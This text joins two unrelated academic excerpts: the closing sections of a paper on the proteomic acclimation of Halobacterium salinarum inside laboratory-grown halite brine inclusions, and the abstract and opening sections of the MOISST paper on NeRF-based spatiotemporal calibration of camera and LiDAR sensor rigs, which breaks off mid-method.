a 12 h:12 h diurnal cycle at 37"C as used here, and did not appear to employ halite surface sterilization or cleaning protocols prior to these survival tests. In contrast, our viability tests of _H. salinarum_ cells from internally inoculated crystals incubated at 37"C over 80 days prior to subjected to surface organics cleaning treatments, dissolution and culturing showed no growth. The lower duration of survival observed for _H. salinarum_ cells inside halite in our study may be the result of increased metabolic activity due to the higher concentration of nutrients in TNPA solution compared to the 100-time diluted modified Payne's medium used in Gramain et al. (2011). _H. salinarum_ is capable of regulating changes in metabolic pathways in response to changes in carbon source availability (Schmid et al., 2009). This could result in an inhibitory effect due to the accumulation of metabolic waste products (Nystrom, 2004) within the closed microenvironment of halite brine inclusions. The products of arginine fermentation include ornithine, CO\({}_{2}\) and NH\({}_{4}\). While the addition of peptone in this present study provided sufficient trace elements (Mg\({}^{2}\), K', etc.) for nominal cell functions and S-layer stability at the moment of halite formation, these nutrients may be depleted over time within the closed environment of brine inclusions (Kixmuller and Greie, 2012), concurrent with the buildup of waste products. In contrast, Winters et al. (2015) showed that starvation of _H. salinarum_ leads to smaller cell size, and hypothesized that this condition could contribute to extended survival within halite brine inclusions. This is somewhat counter-intuitive as natural evaporite environments contain the lysed remains of dead cells and other sources of organics. On the other hand, in the absence of surface sterilization of halite used in the viability studies in Gramain et al. (2011), some of the surviving cells observed in the study may have been the result of surface-adhered cells rather than cells within the halite brine inclusions. These results also suggest a possible survival advantage for cells on halite surfaces rather than those within the brine inclusions over the early stages of evaporation and acclimation, a hypothesis supported by the findings of Gramain et al. (2011) showing no difference in growth for _H. salinarum_ cells evaporated in salt buffer without nutrients and those containing the diluted Payne's medium nutrients. This epillithc lifestyle is likely supported in part by the organics, K, and Cl observed in this study by SEM-EDX analyses to accumulate on the halite surface, derived from the lysis of _H. salinarum_ cells. It is important to note that the vacuum conditions for SEM observations may have resulted in rupture of unfixed _H. salinarum_ cells, which may have otherwise remained intact under normal atmospheric conditions. Altogether, these results of surface contamination confirm that the isolation of proteins exclusively from halite brine requires the removal of halite surface-bound cells and biomolecules. ### Removal of halite surface-bound microorganisms and biomolecules The small sizes of laboratory-grown halite proscribe the use of treatment processes that could result in salt dissolution. Cold atmospheric plasmas were therefore tested in an effort to avoid the use of liquid cleaners based on their effectiveness for the sterilization of spacecraft surfaces for planetary protection (Shimizu et al., 2014) and agricultural applications (Judee et al., 2018). Unfortunately, none of the plasma conditions tested in this study (gas mixtures, power delivery modalities) enabled a complete removal of proteins from the rough textured halite surfaces. However, the results remain encouraging insidar as cold plasma has demonstrated some effects on proteolysis that must now be amplified. Further experiments will be required to innovate an ad hoc plasma process delivering active species at higher densities while treating the whole surface of halite regardless their roughness surface, dimensions or dielectric permittivity. The deactivation of microorganisms and removal of nucleic acids from halite surfaces were been therefore instead performed by adapting chemical wash methods first developed by Rosenzweig et al. (2000) and then optimized by Gramain et al. (2011) and Sankaranarayanan et al. (2011). By reducing the exposure times in sequential NaCl, NaOH, and HCI treatments, and replacing passive chemical baths with an active spray process, we were able to achieve sufficient proteolysis of surface-bound proteins for downstream isolation of proteins exclusively from within halite brine inclusions, while avoiding halite dissolution during treatment. Compared to total proteins extracted from surface sterilized internally inoculated crystals (\(\pm 1\,\mathrm{mg}\) order), residual surface bound proteins (51.6 \(\upmu\)g) were marginal. However, observations of residual pigmentation after removal of halite surface-bound proteins suggests the presence of non-protein pigments such as carotenoids. Further refinements are therefore needed before future studies can isolate lipids exclusively from within halite brine inclusions. Benefits and limitations of the TRIzol-based method for direct extraction of biomolecules from halite brine inclusions TRizol reagent has the distinct benefit of sequential separation of RNA, DNA, and proteins. TRIzol-based protein extraction methods have previously been used and validated to study proteins from liquid cultures of haloarchea (Kirkland et al., 2006; Bide et al., 2008). In this study, we developed and employed a modified procedure that allowed for direct protein extraction from salt crystals, with subsequent desalinations steps compatible with semi-quantitative mass spectrometry analyses from these high salt extracts. Most importantly, our approach avoids induced bias in proteome due to alterations in protein expression over the extended times needed for a slow crystal dissolution prior to protein extraction using other methods. Although peripheral membrane proteins were identified using this approach, transmembrane peptides were absent in the mass spectrometry dataset. We hypothesize that this was due to retention of transmembrane protein domains with the lipid membrane fraction during TRIzol20 extraction in residual phenol phase after protein precipitation with isopropanol (see Supplementary Figure 2-1). Importantly, some transmembrane proteins could be identified by peptides outside the membrane-spanning domains, e.g., the ArcD arginine-ornithine antiporter protein, for which seven cytosolic- and extracellular-facing peptides were identified (see Supplementary Figure 7-1). However, not all transmembrane proteins were identified as evidenced by the lack of identified peptides for bacteriorhodopsin in any samples (stationary phase liquid cultures and brine inclusions). One plausible explanation of this phenomenon is the desalting effect of isopropanol (as suggested by Kirkland et al. (2006)) that can result in increased protein instability, leading to loss of conformation and subsequent peptide fragmentation for peptides outside the transmembrane regions. While these results indicate that further membrane disruption steps may be needed for complete extraction of all transmembrane proteins, similar to the protocol used by Podechard et al. (2018) to isolate membrane lipids using TRIzol, the potential bias introduced by our methodology is limited, as evidenced by the identified peptides on either side of the lipid membrane. Moreover, while TRIzol-based methods have been used for RNA extraction from liquid cultures of _H. salinorum_(De Lomana et al., 2020), it was shown here to be produce RNA from halite fluid inclusions of insufficient quality for RNA-Seq, Indeed, it would appear that further desalting steps would be needed and optimized for extraction of high-quality RNA (see Supplementary Information Section 8 for further details). ### Postulate of cellular origin of total brine extracted proteome The proteins extracted using the protocol presented here represent the total protein complement of the halite brine inclusions. These proteins may be components of viable or non-viable cells, or even proteins released by cells into the extracellular environment of the brine inclusions. Many questions remain about the potential for salts to preserve proteins over time as molecular biosignatures, particularly within the protected evaporite brine inclusions microenvironment. Considering that viability tests performed on the internally inoculated halite crystals demonstrate cell viability after two months of _H. salinarum_ entrapment, we postulate here a cellular origin for the extracted proteins. ### Acclimation of _Halbobacterium salinarum_ to halite brine inclusions We applied the slow laboratory evaporation method to _H. salinarum_ cultures in TNPA buffer followed by removal of halite surface-bound cells and organics (particularly proteins) and selective extraction of proteins from within halite brine inclusions described in the preceding sections. This allowed us to study the early (two months) acclimation of the haloarchaeal cells to halite brine inclusions using a proteomics approach. Stationary growth phase cultures were used as a control to approximate the cell physiology prior to a slow evaporative process. Our analyses were focused on two main themes: (1) cell activity, and (2) interactions between cells and local microenvironment within the brine inclusion. Halite brine inclusions are enclosed microenvironment. While questions remain about possible alterations of brine inclusion composition over geological time scales, during the initial phase after crystal formation the composition is based on the initial hypersaline environment. Conditions of near-saturating salt concentrations lead to low dissolved oxygen available to cells. Cells are therefore hypothesized to be in a physiological state similar to stationary growth phase, with low cell division and altered metabolic activity. Here we examined proteome alterations in response to acclimation to this unique microenvironment. #### Cell activity within halite brine inclusions The metabolism of Halobacterium cells trapped within brine inclusions is hypothesized to shift from aerobic metabolism by respiratory chain to anaerobic fermentation through arginine deaminase pathway (ADI) or ATP generation via photheteroergantrophy. Halite incubations were performed in this study with a 12 h:12 h light:dark photoperiod, allowing for both phototrophy via bacteriorhodopsin and arginine fermentation under oxygen-limited conditions (Hartmann et al., 1980), as are presumed to exist inside closed brine inclusions. These two ATP-generating pathways are antagonistic for liquid cultures of _H. salinarum_, but can theoretically alternate over the diurnal cycle used here to simulate surface conditions two months after halite precipitation. However, exposure to light also depends on the location of the brine inclusion within the halite crystal, with inclusions near the crystal surface receiving higher total irradiance than inclusions near the crystal center. While the extraction protocol used enabled identification of phototrophy-related proteins such as bacteriorhodopsin activators, it did not allow for extraction of many membrane proteins including bacteriorhodopsin itself. Thus, it is not possible to determine if phototrophy-related proteins were differentially expressed in liquid and halite samples. Under anaerobic conditions, Hartmann et al. (1980) showed that while retinal biosynthesis was inhibited by the absence of oxygen, even low levels of bacteriorhodopsin could produce appreciable levels of ATP. A basal expression of proteins for different ATP generating pathways could enable the survival of _H. salinorum_ in the early stages of halite entrapment. Additionally, the potential exists for biomolecule recycling within brine inclusions, similar to that demonstrated by prokaryotes in deep subsurface (Thomas et al., 2019) or other resource-limited environments to limit energy consumption linked to biosynthesis. The reduced viability of _H. salinarum_ in brine inclusions in the presence of organics including arginine compared to starvation conditions seems to favor fermentative metabolism leading to the accumulation of metabolic waste products. Confirmation of the precise metabolic pathways used _H. salinarum_ within halite brine inclusions will require further analyses, overcoming the challenges of accessing the closed halite system. Calculation to the halte brine inclusions microenvironment could presumably involve reduced or silenced cell division, DNA replication and repair pathways. However, the majority of proteins detected implicated in genome maintenance were not differentially expressed between halte brine inclusions and stationary growth phase cultures. This suggests that either such proteins are constitutively expressed, or that DNA replication and cell division occur in a similar fashion for both stationary growth phase cells and those within halte brine inclusions. While early acclimation to the halte brine inclusions microenvironment resulted in nuanced differences in the proteome of _H. salinarum_ cells regarding cell division, replication, DNA repair and transcriptional processes, stark differences were observed for proteins involved in translation activities. Among the shared proteome showing no differential expression between conditions were proteins involved in DNA replication, reparation and transcriptional pathways. This suggests similar levels of genome maintenance between late growth stage cultures and brine entombment. However, translational proteins were not detected in brine extracts, potentially indicating decreased de novo protein synthesis compared to stationary cells. These seemingly contradictory results can be explained by transcriptional activity directed not to mRNA synthesis but to regulatory RNA. However, this hypothesis is not fully satisfactory as tRNA synthesis and ribosomal biogenesis protein quantities remain similar for both conditions. Taken together, these data suggest a model for cellular activity during early acclimation to halte brine inclusion highly similar to that of stationary growth phase cells in liquid culture. Active metabolism appears to continue, with data suggesting anaerobic fermentation. However, it is important to note that the extraction method used had limited success in isolating membrane proteins such as bacteriorhodopsin and sensory rhodopsins. Therefore, their absence in this data set cannot be taken as confirmation of absence in the cell, and as such diurnal cycling between anaerobic metabolisms (arginine fermentation in the dark and photheteroorganotrophy in the light) cannot be ruled out. It is important to note as well that proteomic analyses considered all brine inclusions of a given crystal in a bulk analysis that did not distinguish between brine inclusions near the crystal surface receiving higher irradiance from those deeper within the crystal. Cells maintain at least the capacity for central metabolism, DNA repair, replication, and even cell division comparable to stationary growth phase cells. acclimation to the closed brine inclusions microenvironment appears to severely limit translational activity. However, expressed proteins are preserved indicating low levels of protein turnover. This raises the question of how cells are able to interface with the surrounding microenvironment within the inclusions. #### Interactions between cells and the brine inclusions microenvironment The potential interactions between _H. salinarum_ cells and the local microenvironment within halte brine inclusions focusing on cell surface and mobility processes involved in responses to external stimuli. Previous investigations on the survival of Halobacterium cells trapped within salt crystals have proposed potential for cell envelope modifications with surface proteinaceous layer (S-layer) shed (Fendrihan et al., 2012). However, this result seems to be the due to a lack of trace elements in the TN buffer (4.28 M NaCl, Tris-HCI pH 7.4) used in the 2012 study, as argued by Kixmuller and Greie (2012). The peptome added to the TNPA crystallization buffer used here provided sufficient trace elements (including Mg, Ca, K) for S-layer maintenance and cell envelope function. S-layer shedding within halte brine inclusions was previously thought to improve exchanges between cells and the local microenvironment. However, in this study S-layer proteins were identified in all liquid culture and halte samples without significant up- or down-regulation. This either indicates the S-layer is maintained by _H. salinarum_ cells, or that the S-layer proteins were preserved within the brine inclusion. The fact that S-layer proteins quantities remained comparable to stationary phase cultures with intact S-layers suggests that the S-layer proteins remain associated with _H. salinarum_ cells within brine inclusions. The increased expression of membrane transporters suggests that transport capacity is not only maintained but enhanced in cells during acclimation to halte brine inclusions, likely to maximize extraction of essential molecules and trace elements from the local microenvironment. This may represent a form of biomolecule recycling similar to that demonstrated by procaryotes in deep subsurface (Thomas et al., 2019) or other resource-limited environments to limit energy consumption linked to biosynthesis. The up-regulation of the glycerol-3-phosphate-binding protein precursor may suggest a role for membrane lipid modification within brine inclusions. Cell motility could logically be assumed to be of lesser importance for _H. salinarum_ cells inside the restricted microenvironment of a brine inclusion. The small volume of such inclusions limits the heterogeneity of available oxygen and nutrients, as well as constraining the ability of cells to move away from potentially damaging elements. However, the detection of the Htr signal transducers of the sensory rhodopsin I and II as part of the common proteome of all conditions tested indicates that despite being constrained to brine inclusions, the phototaxis remains functional both prior to and after evaporation of _H. salinarum_ cultures. In contrast, down-regulations of the GwO cluster A and B were observed for halte brine inclusions extracts. A similar down-regulation of gwO mRNA was observed in response to UV irradiation (Baliga et al., 2004), and GwO protein expression levels after exposure to ionizing radiation (Webb et al., 2013). Lack of the GwO gas vesicle expression regulator is thought to inhibit gas vesicle formation, and growth by anoxic arginine fermentation is also known to reduce the number of gas vesicles in _H. salinarum_ NRC-1 (Hechler and Pfeffer, 2009). Therefore, the lack of gas vesicle production could be linked to anaerobic metabolism. Gas vesicle down-regulation suggests a lack of needed capacity for vertical movement in a water column in response to oxygen levels, consistent with the restricted confines of a microscopic halte brine inclusions. This correlates with previous published transcriptomics and proteomics studies on _H. salinarum_ cell showing the impact of salinity and dissolved oxygen concentrations on motility (Schmid et al., 2007; Leuko et al., 2009). If the sensory pathways leading to cell motility remain intact, the proteins required for motility itself are absent. Our data show a general down-regulation of archaellin proteins involved in motility for cells in brine inclusions compared to stationary phase liquid cultures. So, while chemo- and photo-taxis proteins (including Che-family proteins and Httr signal transducers) are maintained in brine inclusions, the accompanying archaellum motility is not. Reduced motility may be induced in halite brine inclusions to preserve energy. The expression of multiple transducer proteins is often correlated with changing environmental conditions, and in this case may be the remanent proteins from the acclimation of _H. salinarum_ to halite brine inclusions. ## 5 Conclusion This is the first study that demonstrate the possibility to isolate proteins directly and efficiently from halite brine inclusions while simultaneously excluding surface-bound contaminating proteins and avoiding changes in cell protein expression during salt dissolution. Also, this work provides the first insights into the molecular mechanisms involved in the early acclimation of _H. salinarum_ within brine inclusions. Based on our findings, the cells of _H. salinarum_ appear to be in a low activity "maintenance" or "semi-dormant" state, similar to other bacteria and archaea in low-energy environments such as the deep biosphere (reviewed in Lever et al. (2015)). Whether or not _H. salinarum_ cells inside brine inclusions are true "persister" cells (Megaw and Gilmore, 2017) will require future study. Further investigation is also needed to explore the hypothesis of biomolecules recycling similar to that observed in deep sediments (Thomas et al., 2019). Despite the reasonable assumption brine inclusions represent stress conditions for Halobacterium cells, no increased expression of stress-response proteins such as chaperones was observed. The acclimation to the halite environment may therefore be less a stress response than a reduction in cell activity. Shifts in the proteome of _H. salinarum_ NRC-1 have been studied using liquid cultures under conditions similar to those thought to exist inside halite brine inclusions: reduced oxygen content (Schmid et al., 2007), increased salinity (Leuko et al., 2009), and transitions from aerobic to anaerobic growth (Tebbe et al., 2009). While the down-regulation of certain ribosomal proteins and archaellum precursors was also observed following salinity stress (Leuko et al., 2009) not all protein expression shifts contorned to this pattern. The same was observed for the transition from aerobic to anaerobic growth, with increased expression of the arginine deaminase as observed by Tebbe et al. (2009) but other protein expression differences due to the use of culturing conditions that were not identical to those in previous studies. Thus, while proteomics analyses from liquid cultures can provide hints to aid in the interpretation of the data presented here, they cannot fully explain the observed patterns of protein expression within halite brine inclusions. The unique environment of halite brine inclusions limits exchange of nutrients between cells and their surrounding environment. It also allows for the buildup of metabolic waste products which appear to limit the duration of cell viability within the brine inclusions. Further functional investigations are clearly needed to confirm the hypotheses generated by proteomics data in this study, particularly in regard to cell activity. While this study does not resolve the question of how long microorganisms are able to retain viability within halite brine inclusions, it offers clear insights into the process of early microbial acclimation to evaporation of hypersaline environments in halophilic archaea. The methodologies presented here will also enable future study of the biomolecules of microorganisms in halite inclusions in natural settings, particularly small-sized halite crystals. ### Data availability statement The datasets presented in this study can be found in online repositories. The names of the repository/repositories and accession number(s) can be found in the article/Supplementary material. ### Author contributions Study was designed by AK in collaboration with CF, with the participation of AH and SZ in experimental design and supervision. Experiments were conducted by CF with the help of MM for crystals forming. AM and RP for mass spectrometry and improvements of extraction methods. BA-B for nanoLC-MS/MS data acquisition. FG for MEB-EDX analyses. AT for RNA extraction and TD for plasma treatments. Proteomics data treatments were conducted by AT and CF. Manuscript was written by CF. All authors contributed to the article and approved the submitted version. ### Funding This work was supported by the X-life program of CNRS-MITI, the ATM program of the Museum National d'Histoire Naturelle, the French National Research Agency ANR-PRCI "ExocubeHAD" project (ANR-21-CE49-0017-01_ACT), and the Sorbonne Universite (graduate stipend CF). ### Acknowledgments UHPLIC MS/MS data were acquired at the Plateau Technique de Spectrometrie de Masse Bio-organique, UMR 7245 Molecules de Communication et d'Adaptation des Microorganismes, Museum national d'Histoire naturele, Paris, France. The nanoLC-MS/MS data were acquired at ProGenoMix MS-platform, IBISA labeled, at CEA/SPI/U2D. Thanks to Immee Esteve of the Fib and SEM facility of IMPMC which was supported by Region Ile de France Grant SESAME 2006 NOI-07-593/R, Institut National des Sciences de l'Univers (INSU)-CNRS, Institut de Physique-CNRS, Sorbonne Universite, and the French National Research Agency (ANR) grant ANR-07-B1AN-0124-01. Parts of figures used images from Servier Medical Art. Servier Medical Art by Servier is licensed under a Creative Commons Attribution 3.0 Unported License ([https://creatwecommons.org/licenses/by/3.0/](https://creatwecommons.org/licenses/by/3.0/)). ### Conflict of interest The authors declare that the research was conducted in the absence of any commercial or financial relationships that could be construed as a potential conflict of interest. Publisher's note
2303.03056
MOISST: Multimodal Optimization of Implicit Scene for SpatioTemporal calibration
With the recent advances in autonomous driving and the decreasing cost of LiDARs, the use of multimodal sensor systems is on the rise. However, in order to make use of the information provided by a variety of complimentary sensors, it is necessary to accurately calibrate them. We take advantage of recent advances in computer graphics and implicit volumetric scene representation to tackle the problem of multi-sensor spatial and temporal calibration. Thanks to a new formulation of the Neural Radiance Field (NeRF) optimization, we are able to jointly optimize calibration parameters along with scene representation based on radiometric and geometric measurements. Our method enables accurate and robust calibration from data captured in uncontrolled and unstructured urban environments, making our solution more scalable than existing calibration solutions. We demonstrate the accuracy and robustness of our method in urban scenes typically encountered in autonomous driving scenarios.
Quentin Herau, Nathan Piasco, Moussab Bennehar, Luis Roldão, Dzmitry Tsishkou, Cyrille Migniot, Pascal Vasseur, Cédric Demonceaux
2023-03-06T11:59:13Z
http://arxiv.org/abs/2303.03056v3
# MOISST: Multi-modal Optimization of Implicit Scene for SpatioTemporal calibration ###### Abstract With the recent advances in autonomous driving and the decreasing cost of LiDARs, the use of multi-modal sensor systems is on the rise. However, in order to make use of the information provided by a variety of complimentary sensors, it is necessary to accurately calibrate them. We take advantage of recent advances in computer graphics and implicit volumetric scene representation to tackle the problem of multi-sensor spatial and temporal calibration. Thanks to a new formulation of the implicit model optimization, we are able to jointly optimize calibration parameters along with scene representation based on radiometric and geometric measurements. Our method enables accurate and robust calibration from data captured in uncontrolled and unstructured urban environments, making our solution more scalable than existing calibration solutions. We demonstrate the accuracy and robustness of our method in urban scenes typically encountered in autonomous driving scenarios. ## I Introduction Most robotic and intelligent systems rely heavily on sensory information to achieve various tasks. Moreover, commonly encountered sensor setups for autonomous driving consist of multiple sensors acquiring different data modalities (e.g. cameras, LiDARs, IMUs, GNSS systems, etc.) which can greatly improve the performance on different tasks such as mapping [1], localization [2] and perception [3]. However, to correctly exploit and merge the information provided by all sensors, it is important to represent their data in a common reference frame. Spatial extrinsic calibration is the process that determines the relative geometric transformation between the sensor poses by considering a 6-DoF rigid-body transformation. Although accurate spatial calibration is essential in multi-sensor setups, it is often not sufficient due to time synchronization issues between the different sensors. Time synchronization is the process that determines the time offset between the different sensor measurements, in the case there is no hardware synchronization which would eliminate any delay. Current existing methods commonly require the use of calibration targets placed in the scene to fuse all sensors in a common frame [4, 5]. This is unpractical in many cases, especially for dynamic tasks, where the calibration setup must be redone regularly. Although some papers offer solutions to bypass this constraint by detecting salient geometric features (e.g. edges [6, 7], planes [8]) within acquired scenes, such features might not be present in all kind of environments. Furthermore, these methods often do not consider the possible asynchronization of the sensors. The effect of a wrongly synchronized rig can have a consequential impact on the performance depending on the task. Moreover, unconsidered time offsets within calibration can strongly degenerate extrinsic estimation leading to suboptimal results. Considering all the issues mentioned above, we introduce our new method called MOISST: Multi-modal Optimization of Implicit Scene for SpatioTemporal calibration. MOISST is a novel calibration method which leverages an implicit neural 3D scene representation known as Neural Radiance Fields (NeRF) [9]. It can be trained with any kind of sensor providing radiometric or geometric information on a given 3D scene. This representation is by nature the common reference frame used for the sensor fusion. We take advantage of the differentiable property of our scene representation to simultaneously learn the scene's geometry and colors, and the poses given to the neural network. Unlike existing NeRF-based methods of pose regression [10, 11, 12], we consider the rigid constraint in the multi-sensor rig to reduce the number of optimized parameters. By using a time-parameterized differentiable formulation for the main sensor trajectory, we can also detect and compensate potential time offsets between the sensors. To the best of our knowledge, tackling the problem of multi-sensor spatiotemporal calibra Fig. 1: Effect of calibration on novel view synthesis: training positions in red, ground truth positions in green, reference position in blue. The RGB images (top) and depth maps (middle) are rendered from an implicit neural 3D scene trained from non-calibrated (left) and calibrated with MOISST (right) sensors. tion using implicit representations has not been proposed before in the literature. Thanks to our formulation, we are able to propose a targetless solution to spatiotemporal calibration of multi-modal sensors, that is also structureless, as we do not require specific geometric structures like edges or planes in the scene for our method. Compared to other methods and because of the aforementioned characteristics of our solution, MOISST is especially adapted to perform automatic re-calibration of a multi-sensor device during the full life-cycle of the system. MOISST is a simple - _it can be run from acquisition data recorded in any environment_ - and inexpensive - _it does not require target or external hardware_ - calibration solution, that are crucial features for robots and large scale fleet of autonomous vehicles. ## II Related Work ### _Multi-modal extrinsic and temporal calibration_ Extrinsic calibration for multi-modal sensors is a well studied subject that can be categorized in two main groups: target-based and targetless methods. #### Ii-A1 Target-based calibration Zhang _et al._[4] were the first to introduce the use of a planar checkerboard target for camera and laser range finder calibration, by using the latter to determine the checkerboard plane, and the pattern seen by the camera to calculate its pose. Three pairs of capture measurements are enough to deduce extrinsic parameters between both sensors. Geiger _et al._[5] propose a solution to calibrate the sensors with a single capture, by placing multiple targets in the scene. While these methods provide satisfactory calibration accuracy, they necessitate the placement of targets in the scene, which might not be available or practical to place in typical real-world scenarios. #### Ii-A2 Targetless calibration Targetless methods usually use the concept of mutual information, by matching corresponding elements obtained through different type of sensors. This can be edges for visible cameras, depth gradient for LiDARs [6, 7], or the use of correspondence between image intensity and surface normals [13]. However, by relying on specific geometric features, these methods only work in a well structured scene with noticeable, recognizable and detectable patterns such as straight lines or edges and often work only in indoor environments. There is also a set of deep learning based methods [14, 15, 16], able to find the transformation between a camera capture and a LiDAR scan. However, these methods are trained in a supervised manner, needing a labeled dataset, and are prone to overfitting, limiting their use to environments reflecting the training dataset. Although the previously mentioned methods achieve satisfactory performance given ideal conditions, they suppose a perfectly time-synchronized set of sensors, which is possible through specific hardware [17] but is often challenging and sensor dependant (i.e. most low-cost cameras do not support such features). There exists some methods tackling temporal calibration, both target-based [18], or targetless [8], they require however additional sensors such as calibrated camera-IMU pair to obtain a precise trajectory. With the methods proposed by Taylor _et al._[19] and Park _et al._[20], visual and LiDAR odometry are used to calculate trajectories for each sensor and match them allowing for both spatial and temporal calibration. Nevertheless, this approach can generate a progressive drift with the accumulated transformations between the frames. Contrary to the previously mentioned methods, MOISST does not require any targets (i.e. targetless) and determines both spatial and temporal calibration parameters by only relying on the poses of a single sensor, avoiding the cumulative errors in the different per-sensor trajectories. At the same time, we fuse information from all sensors, and thanks to the use of a dense implicit scene representation, we do not require specific geometric structure (i.e. structureless). This approach allows compatibility with a greater variety of scenes and allows us to scale to almost all real-world scenarios. ### _Neural 3D scene representation_ NeRF [9] is an implicit representation of a 3D scene primarily used for novel view synthesis. From a set of images and their corresponding camera poses, the model learns the 3D geometry by differentiable volume rendering. NeRF provides a continuous representation, resulting in improved rendering fidelity and compactness compared to classical explicit scene representations [21]. Beyond the rendering ability, many recent methods have used these implicit scene representations for downstream robotics tasks [22, 23, 24]. NeRF stores all the color and density information of the scene in a multilayer perceptron (MLP), and allows any rendering resolution as the representation is continuous. The model takes as input a 3D coordinate and a direction vector, outputs a color and density information for this 3D point, and is trained through a differentiable rendering procedure. A sinusoidal encoding [25] of the input coordinate maps the low dimensional 3D position and direction to a higher dimension representation, allowing the rendering of a highly detailed scene representation. To speed-up convergence, Instant Neural Graphics Primitives (Instant-NGP) [26] was introduced, allowing much faster convergence with higher quality rendering. It uses a multi-resolution hash encoding instead of sinusoidal encoding, considerably reducing the size of the trained MLP. The training of NeRF requires mainly RGB images from cameras, optionally depth information such as point clouds from LiDARs [27], along with registered poses for each sensor frame. The final rendering quality is highly dependant on the precision of these poses, as seen in Fig. 1, where the result without optimization has incorrect geometry, produces low quality novel views and is, hence, not usable. As an answer to this limitation, NeRF\({}^{--}\)[10] exploits the fully differentiable structure of NeRF to not only train the NeRF model, but also to optimize the camera poses. This makes the model robust to noisy poses, as it is able to optimize both the camera poses alongside the NeRF model. SCNeRF [11] uses the first two columns of the rotation matrix to formulate rotations instead of Rodrigues formula to achieve better convergence, and BARF [12] improves upon these methods by using low-to-high frequency release for the input positional encoding, avoiding local minima during pose optimization. In our proposal, because we focus on multi-sensor calibration, we only optimize the extrinsic transformation between the sensors instead of optimizing each pose of each frame independently. Indeed, in a rigid sensor setup, sensors are not allowed to move freely relative to each other. Compare to aforementioned methods, this novel and calibration-focused formulation reduces the number of parameters to be optimized and is more robust to outliers thanks to the rigidity constraint imposed on each pose. The proposed formulation also allow us to optimize the time offset between sensors, which is often hard to be achieved within the same optimization framework and may require additional information. ## III Method ### _Notations and background_ #### Iii-A1 Notations We consider a multi-sensor system with \(S\) sensors with \(r\in[1,S]\) being our reference sensor and each sensor is either a camera or a LiDAR. We use the following notations to describe our method: * \(\left\{N_{i}\right\}_{i\in[1,S]}:\) set of number of frames captured by each sensor, * \(n_{i},n\in[1,N_{i}]\): index of frames captured by sensor \(i\), * \(t^{n_{i}}\in\mathbf{R}^{+}\): the absolute timestamp of frame \(n_{i}\) relative to the sensor \(i\) clock, * \(\delta_{i}\in\mathbf{R}\): the time offset between the reference frame clock and the sensor \(i\) clock, * \({}_{w}T^{i}(t)\in\mathbf{R}^{4\times 4}\): the pose transformation matrix of sensor \(i\) at time \(t\) (time relative to sensor \(i\) clock) in the world reference, * \({}_{j}T^{i}\in\mathbf{R}^{4\times 4}\): the extrinsic homogeneous transformation matrix from sensor \(i\) to sensor \(j\). We aim to calibrate our system according to the reference sensor. The goal is, hence, to obtain the transformation matrices \({}_{j}T^{i}\) and time offsets \(\delta_{i}\) between the sensors to calibrate and the reference one. We consider that we know the pose of sensor \(r\) in a global frame, which could be easily obtained through SLAM [28] or Structure-from-Motion [29]. We also consider its clock as the reference clock, \(\delta_{r}=0\). From poses of reference sensor, \({}_{w}T^{r}(t^{n_{r}}),n_{r}\in[1,N_{r}]\), we build a continuous trajectory. We do that by interpolating between the existing poses, and extrapolating outside the defined temporal bounds by extending the transformations at the beginning and the end of the sequence. This modeling process is very similar to what is defined in [20]. For the interpolation functions, we used spherical linear interpolation (SLERP) [30] for the rotation, and linear interpolation (LERP) for the translation. We denote this interpolation function as \(\mathcal{T}_{r}\): \[{}_{w}T^{r}(t)=\mathcal{T}_{r}(t). \tag{1}\] #### Iii-A2 Spatiotemporal calibration Given the spatial extrinsic calibration and the time offset of the other sensors regarding our reference sensor, we can compute the pose of sensor \(i\) in a global frame with the formula: \[{}_{w}T^{i}(t^{n_{i}}+\delta_{i})=\mathcal{T}_{r}(t^{n_{i}}+\delta_{i})\,{}_{ i}T^{r}. \tag{2}\] #### Iii-A3 Implicit neural scene representation An implicit neural representation models a scene with a neural network by mapping coordinates as inputs to quantities of interests, such as color or density, as outputs. By evaluating points along camera rays and composing their densities and colors through volumetric rendering, such methods can synthesize RGB images and depth maps1 from an arbitrary sensor pose. Footnote 1: We can estimate depth of ray by alpha composition of distances from the center of the ray to the sampled points. In order to train said neural network on a specific scene, it is necessary to have a training set with sensor information and a pose associated. This information may be an RGB image in the case of visible camera, or a point cloud in the case of a LiDAR. We aim to find the parameters of the neural network \(\Theta\) that minimizes the difference between the provided information (\(I^{n_{i}}\) - image \(n_{i}\) of sensor \(i\) - or \(D^{n_{i}}\) - depth information \(n_{i}\) of sensor \(i\)) and the rendered result by the model defined as: \[\mathcal{R}_{I}\left({}_{w}T^{i}(t^{n_{i}})\mid\Theta\right), \tag{3}\] \[\mathcal{R}_{D}\left({}_{w}T^{i}(t^{n_{i}})\mid\Theta\right), \tag{4}\] with \(\mathcal{R}_{I}\) being the model inference and ray composition function that returns a RGB image prediction of frame \(n_{i}\) for sensor \(i\) and \(\mathcal{R}_{D}\) being equivalent to \(\mathcal{R}_{I}\) but returning rays depth instead of colors. By minimising the loss \(\mathcal{L}_{total}\) defined as: \[\mathcal{L}_{total} = \lambda_{C}\mathcal{L}_{C}+\lambda_{D}\mathcal{L}_{D}, \tag{5}\] \[\mathcal{L}_{C} = \sum_{i=1}^{S}\sum_{n_{i}=1}^{N_{i}}\left\|\mathcal{R}_{I}\left({} _{w}T^{i}(t^{n_{i}})\mid\Theta\right)-I^{n_{i}}\right\|_{2}^{2},\] (6) \[\mathcal{L}_{D} = \sum_{i=1}^{S}\sum_{n_{i}=1}^{N_{i}}\left\|\mathcal{R}_{D}\left({} _{w}T^{i}(t^{n_{i}})\mid\Theta\right)-D^{n_{i}}\right\|_{2}^{2}, \tag{7}\] with \(\lambda_{C}\), \(\lambda_{D}\) weighting hyper-parameters, we can estimate the optimal network parameters \(\hat{\Theta}\) satisfying: \[\hat{\Theta}=\underset{\Theta}{\text{argmin}}(\mathcal{L}_{total}). \tag{8}\] As explained by Wang _et al._[10], because the scene representation we use is fully differentiable, it is possible to optimize the input poses with gradient descent jointly with the radiance field parameters. The optimization objective becomes the following: \[\left\{\hat{\Theta},{}_{w}\hat{T}^{i}\right\}=\underset{\Theta,{}_{w}T^{i}}{ \text{argmin}}(\mathcal{L}_{total}). \tag{9}\] ### _MOISST Optimization formulation_ In this section, we introduce our novel optimization formulation for multi-sensor system spatiotemporal calibration. Considering a multi-sensor system such as a robot or an autonomous car, we know that the poses of each sensor observation are not independent, as it exists a rigid transformation between each sensor. Because we know the trajectory \(\mathcal{T}_{r}\) of the reference sensor \(r\), we can express the absolute pose of each remaining sensor according to sensor \(r\) (see equation 2). Substituting \({}_{w}T^{i}\) in equation 3 leads to the following formulation: 